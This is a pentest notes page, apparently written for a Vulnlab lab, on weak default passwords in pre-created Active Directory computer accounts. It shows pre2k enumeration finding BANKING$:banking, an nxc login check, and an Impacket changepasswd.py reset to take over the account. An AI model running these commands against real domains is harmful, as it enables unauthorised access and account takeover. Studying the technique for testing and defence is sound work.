Pre-Created Computer Accounts

When you pre-create computer accounts with the Assign this computer account as a pre-Windows 2000 computer checkmark, the password for the computer account becomes the same as the computer account in lowercase (DavesLaptop$ would have the password daveslaptop).

Identification

# pre2k auth -u trainee -p trainee -d retro.vl -dc-ip 10.10.118.214 -verbose 

                                ___    __         
                              /'___`\ /\ \        
 _____   _ __    __          /\_\ /\ \\ \ \/'\    
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <    
\ \ \L\ \ \ \//\  __//\______\  // /_\ \\ \ \\`\  
 \ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
  \ \ \/  \/_/ \/____/         \/_____/   \/_/\/_/
   \ \_\                                      v3.0    
    \/_/                                          
                                            @garrfoster
                                            @Tw1sm          

[04:15:00] INFO     Retrieved 2 results total.                                                                                                                                         
[04:15:00] INFO     Testing started at 2025-01-30 04:15:00                                                                                                                             
[04:15:00] INFO     Using 10 threads                                                                                                                                                   
[04:15:00] INFO     VALID CREDENTIALS: retro.vl\BANKING$:banking                                                                                                                       
[04:15:00] DEBUG    Invalid credentials: retro.vl\DC$:dc

# nxc smb 10.10.118.214 -u 'BANKING$' -p 'banking'         
SMB         10.10.118.214   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.118.214   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

Change Password

# changepasswd.py retro.vl/BANKING\$:banking@10.10.118.214 -newpass P@ssw0rd -p rpc-samr
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

# nxc smb 10.10.118.214 -u 'BANKING$' -p 'P@ssw0rd' 
SMB         10.10.118.214   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.118.214   445    DC               [+] retro.vl\BANKING$:P@ssw0rd

Resources

Diving Deeper Into Pre-created Computer AccountsOptiv

Diving into Pre-Created Computer AccountsTrustedSec

Pre-Windows 2000 computers | The Hacker Recipeswww.thehacker.recipes

vulnlab-retroPuckieStyle

PreviousMisconfiguration NextPrivileged Access

Last updated 2 months ago